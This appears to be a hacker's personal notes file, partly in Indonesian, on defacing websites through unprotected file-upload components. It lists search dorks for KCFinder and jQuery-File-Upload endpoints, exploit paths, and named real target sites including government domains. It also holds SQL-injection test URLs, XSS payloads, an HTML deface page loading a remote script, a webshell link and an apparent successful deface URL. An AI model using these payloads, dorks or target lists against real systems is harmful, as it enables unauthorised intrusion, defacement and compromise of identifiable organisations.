Dork:
inurl:/asset/kcfinder
inurl:templates/_editor/kcfinder/
inurl:includes/kcfinder/browse.php
inurl:/kcfinder/browse.php
lib/kcfinder/files/upload
admin/kcfinder/files/upload
panel/kcfinder/upload/files
editor/kcfinder/upload
Kcfinder/upload/files
inurl:/panel/kcfinder/ ext:png


Exploit:
tambahkan /upload.php di belakang kcfinder


Tools online
https://exploits.my.id/


inurl:"/index.php?option=com_media"

admin/ckeditor/kcfinder/upload.php

exploit tools web

JSO generator


JSO
Inurl:/admin/hubungi.php
Inurl:/add.php intext:"tambah"
intext:"Tulis Komentar"

https://www.youtube.com/@mr.zeus-x0126


https://rapifilms.com/asset/
https://www.zoemacaron.fr/wp-content/cache/page_enhanced/www.zoemacaron.fr/asset/kcfinder/upload.php/

next try
https://www.youtube.com/watch?v=3V_kGij_gpQ
https://fhxploit.com/deface-kcfinder-mass-auto-exploiter/

trick ke index
https://www.youtube.com/watch?v=MYLmMGFBcNE
+server/php

target
https://www.grulich-rene.cz/kcfinder/browse.php
https://pn-pati.go.id/index.php/hubungi-kami

--------------------------------------------------------------------------------

Index trick
https://pastebin.com/raw/FULTRaZ9
exploit: /server/php/
(exploit paste setelah text jquery-file-upload)
contoh: https:www.contohtarget.com/[path]/assets/global/plugins/jquery-file-upload/server/php/

inurl:/assets/global/plugins/jquery-file-upload/
inurl:/assets/plugins/jquery-file-upload
intext:Metronic Shop UI description.
inurl:/plugins/jquery-file-upload/
inurl:/plugins/jQuery-File-Upload/
inurl:/vendor/jquery-file-upload/
inurl:/assets/jquery-file-upload/
inurl:/admin/jquery-file-upload/

target
https://jdih.dephub.go.id/assets/global/plugins/jquery-file-upload/server/php/
http://52.33.30.75/mis/assets/global/plugins/jquery-file-upload/
http://gisportal.acehprov.go.id/

inurl examples/upload.html
inurl:page/detail/ site:go.id

-------------------------------
https://cwatch.comodo.com/blog/website-security/hack-this-site-in-7-steps/

list of websites with dork PHP. 
inurl:.php?id=


------------------------
<!DOCTYPE html>
<html>
    <head>
        <title>VXV</title>
        <script type="text/javascript" src="https://pastebin.com/raw/CD1Dvy2m"></script>
    </head>
<body>
    <h1>VXV</h1>
</body>
</html>


---------------
xss attack
<script>alert(123)</script>
<script>document.body.innerHTML="<img src='image-link'/>"</script>
192.168.138.150/multilidae/index/php




Tinggal tusbol deh pakai SC Deface / Shell lu bro ;v

---------------------------------------------------
kali linux

Video tutorial 
https://www.youtube.com/watch?v=9bIw51twZQA

video hack fhxploit
https://www.youtube.com/watch?v=YriYszGRCaI

file webshell
https://github.com/tennc/webshell/blob/master/xakep-shells/PHP/wso.txt

--------------------------------------------------------

sql inject
step : https://cwatch.comodo.com/blog/website-security/hack-this-site-in-7-steps/
dock : inurl:.php?id= site:go.id

target
https://www.promare.be/shop.php?id=1%27
http://esjindex.org/search.php?id=1%27
http://berkeleyrecycling.org/page.php?id=5%27

------------------------------------------------------------


inurl:examples/ uploadbutton.html 

https://www.youtube.com/watch?v=0Cg70qrS9rI
sucess
http://www.mtcbus.com.tw//Public/Js/kindeditor/attached/file/20221204/20221204162241_61847.html